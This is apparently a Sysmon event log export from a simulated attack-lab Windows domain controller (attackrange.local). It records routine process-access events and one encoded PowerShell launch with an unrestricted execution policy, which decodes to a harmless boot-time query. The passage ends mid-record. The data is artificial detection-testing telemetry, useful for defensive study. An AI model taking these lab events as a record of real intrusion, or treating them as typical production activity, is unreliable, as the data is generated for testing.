{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2492,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F8B-5F25-0000-0010905D0400}\r\nSourceProcessId: 4120\r\nSourceThreadId: 4140\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-001014640400}\r\nTargetProcessId: 4192\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F8B-5F25-0000-0010905D0400}","SourceProcessId":"4120","SourceThreadId":"4140","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-001014640400}","TargetProcessId":"4192","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2493,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-00103ECD0000}\r\nTargetProcessId: 1304\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+827d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-00103ECD0000}","TargetProcessId":"1304","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+827d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2494,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C8050100}\r\nTargetProcessId: 1844\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C8050100}","TargetProcessId":"1844","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2495,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.838\r\nProcessGuid: {41C8662E-1F8B-5F25-0000-001027660400}\r\nProcessId: 4212\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-1F88-5F25-0000-0020B3460400}\r\nLogonId: 0x446B3\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-1F8B-5F25-0000-001014640400}\r\nParentProcessId: 4192\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.838","ProcessGuid":"{41C8662E-1F8B-5F25-0000-001027660400}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-1F88-5F25-0000-0020B3460400}","LogonId":"0x446b3","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-1F8B-5F25-0000-001014640400}","ParentProcessId":"4192","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2496,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F8B-5F25-0000-001014640400}\r\nSourceProcessId: 4192\r\nSourceThreadId: 4196\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-001027660400}\r\nTargetProcessId: 4212\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F8B-5F25-0000-001014640400}","SourceProcessId":"4192","SourceThreadId":"4196","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-001027660400}","TargetProcessId":"4212","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2497,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-001027660400}\r\nTargetProcessId: 4212\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-001027660400}","TargetProcessId":"4212","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2498,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2499,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2500,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 